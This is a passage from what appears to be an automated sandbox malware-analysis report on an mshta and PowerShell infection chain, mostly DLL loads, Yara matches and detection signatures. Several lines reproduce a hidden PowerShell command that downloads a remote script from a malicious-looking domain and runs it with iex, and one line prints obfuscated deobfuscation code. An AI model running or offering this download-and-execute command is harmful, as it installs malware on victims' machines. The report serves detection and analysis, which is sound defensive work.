A0AFEAMAA0AEMAVwBRAFQAVAA1ADYAQQBqAFIAMgBNAHcAVwBvAFUATgBaAG4AYwBKAEoAbgBZAEkATgA4AEoAUQBPADcASwBoAHEAJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000004.00000002.2735376513.000000000CC49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2510709371.0000000007570000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000004.00000002.2735376513.000000000CC49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2510709371.0000000007570000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000004.00000002.2735376513.000000000CB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2735376513.000000000CB61000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              Found suspicious powershell code related to unpacking or dynamic code loading
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($eDuVPKOmWLywFJ));$IobVFotupeC = $SDGGYXgNFokyD.GetBytes($VNWiNSmnoXPnxxhoE);$rCmuVVpMQptcH = $(for ($IENCMsPdnW = 0; $IENCMsPdnW -lt $IobVFotupeC.length; ) {for ($mBsGdpXEcrGMynCGazw
                              Suspicious powershell command line found
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" Jump to behavior
                              Yara detected Costura Assembly Loader
                              Source: Yara matchFile source: 4.2.powershell.exe.6819687.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.powershell.exe.6819687.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.powershell.exe.6898e70.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.powershell.exe.67d9667.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.powershell.exe.675c010.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.powershell.exe.6898e70.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000004.00000002.2473160112.000000000668F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000002.2473160112.0000000006898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTR
                              Yara detected MSILLoadEncryptedAssembly
                              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTR
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_052E57AB pushad ; retf 2_2_052E57A9
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_052E5790 pushad ; retf 2_2_052E57A9
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04E7DCD5 pushad ; iretd 4_2_04E7DCE9
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0723AAE1 push 8BFFFFFDh; ret 4_2_0723AAE8
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0723A8F9 push FFFFFFB9h; retf 4_2_0723A8FB
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078A9660 push 5D000000h; ret 4_2_078A96A9
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078AF3B6 push ebx; retf 4_2_078AF385
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078A9B5C push eax; iretd 4_2_078A9F41
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078A9B60 push eax; iretd 4_2_078A9F41
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078A6A3F push eax; ret 4_2_078A6A59
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078A6A60 push eax; ret 4_2_078A6A59
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0793F62E push edx; iretd 4_2_0793F63B
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_085E32D0 push 8BFFFFFFh; retf 4_2_085E32D6
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA419CD push B8104288h; retf 4_2_0AA419D7
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA41929 push B80F4288h; iretd 4_2_0AA41933
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA4196A push B80F4288h; retf 4_2_0AA41974
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA41686 push B80A4288h; iretd 4_2_0AA41690
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA42484 push B8234288h; ret 4_2_0AA424A0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA60BF8 push ss; retf 4_2_0AA60BFA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA60B2B push ss; retf 4_2_0AA60B32
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA60B29 push ss; retf 4_2_0AA60B2A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA6884B push ecx; retf 4_2_0AA68852
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA68848 push ecx; retf 4_2_0AA6884A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA68781 push eax; retf 4_2_0AA68782
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0AA60D13 push ss; retf 4_2_0AA60D1A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00447154 pushad ; retn 0042h10_2_00447155
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004469E4 pushad ; retn 0042h10_2_004469E5
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043FD60 push eax; mov dword ptr [esp], ACAFAE61h10_2_0043FD61
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00448580 push esi; iretd 10_2_00448581
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00447752 push edx; iretd 10_2_00447756
                              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
